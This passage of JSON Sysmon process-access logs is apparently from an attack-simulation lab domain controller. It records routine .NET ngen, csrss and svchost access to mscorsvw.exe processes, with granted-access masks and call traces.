\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7080,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:19.038\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-223F-5F25-0000-001049E30B00}\r\nTargetProcessId: 1572\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:19.038","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-223F-5F25-0000-001049E30B00}","TargetProcessId":"1572","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7081,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:19.054\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-223F-5F25-0000-001049E30B00}\r\nTargetProcessId: 1572\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:19.054","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-223F-5F25-0000-001049E30B00}","TargetProcessId":"1572","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7082,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:19.070\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-223F-5F25-0000-001042E60B00}\r\nTargetProcessId: 2620\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:19.070","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-223F-5F25-0000-001042E60B00}","TargetProcessId":"2620","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7083,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:19.070\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-223F-5F25-0000-001042E60B00}\r\nTargetProcessId: 2620\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:19.070","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-223F-5F25-0000-001042E60B00}","TargetProcessId":"2620","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7084,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:19.085\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-223F-5F25-0000-001042E60B00}\r\nTargetProcessId: 2620\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:19.085","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-223F-5F25-0000-001042E60B00}","TargetProcessId":"2620","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7085,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:19.117\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2218-5F25-0000-00108DE70A00}\r\nTargetProcessId: 2380\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:19.117","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2218-5F25-0000-00108DE70A00}","TargetProcessId":"2380","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7086,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:19.117\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2218-5F25-0000-00108DE70A00}\r\nTargetProcessId: 2380\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:19.117","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2218-5F25-0000-00108DE70A00}","TargetProcessId":"2380","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7087,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:19.117\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2218-5F25-0000-00108DE70A00}\r\nTargetProcessId: 2380\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:19.117","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2218-5F25-0000-00108DE70A00}","TargetProcessId":"2380","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C: